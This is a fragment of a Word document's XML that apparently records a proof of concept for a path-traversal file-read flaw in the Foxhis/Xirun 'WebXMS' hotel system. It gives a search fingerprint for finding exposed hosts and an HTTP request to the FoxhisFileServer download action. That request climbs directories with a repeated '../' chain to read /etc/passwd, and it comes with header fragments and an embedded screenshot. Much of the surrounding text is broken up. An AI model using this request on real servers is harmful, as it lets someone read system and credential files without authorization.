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5B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659EF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body="WebXMS" || body="西软云XMS"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2198E255">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2817583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/FoxhisFileServer/action?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download</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia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2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/..//..//..//..//..//..//..//..//..//..//..//../etc/passwd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29BDB05F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7DD09E39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zh-CN,zh;q=0.9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D15776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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40575F7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Chrome/142.0.0.0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19EBD5F7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0949C015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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBB633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74E20A2B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5260340" cy="2055495"/>
            <wp:effectExtent l="0" t="0" r="16510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F976"/>
    <w:p w14:paraId="49A5D65E"/>
    <w:p w14:paraId="0EAEDB6D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05665"/>
    <w:rsid w:val="1F6E6866"/>
    <w:rsid w:val="2D84499D"/>
    <w:rsid w:val="36A23083"/>
    <w:rsid w:val="38972403"/>
    <w:rsid w:val="3F3B2646"/>
    <w:rsid w:val="3FE02E25"/>
    <w:rsid w:val="44EE3FA4"/>
    <w:rsid w:val="45501F6F"/>
    <w:rsid w:val="496A3433"/>
    <w:rsid w:val="4A3F3D5D"/>
    <w:rsid w:val="4B1411A9"/>
    <w:rsid w:val="50665080"/>
    <w:rsid w:val="5B9607C1"/>
    <w:rsid w:val="5DA17B6A"/>
    <w:rsid w:val="5EA05A1B"/>
    <w:rsid w:val="601D2C72"/>
    <w:rsid w:val="650D53ED"/>
    <w:rsid w:val="680D0B65"/>
    <w:rsid w:val="68BD46AF"/>
    <w:rsid w:val="734C5929"/>
    <w:rsid w:val="79332791"/>
    <w:rsid w:val="7D895CFF"/>
    <w:rsid w:val="7E7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508</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>6</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>530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2025-10-22T02:47:00Z</dcterms:created>
  <dc:creator>DELL</dc:creator>
  <cp:lastModifiedBy>追梦轩</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-23T08:42:51Z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BDBBD6D327D54D71AF9FB46CD56D071A_12</vt:lpwstr>
  </property>
</Properties>
</file>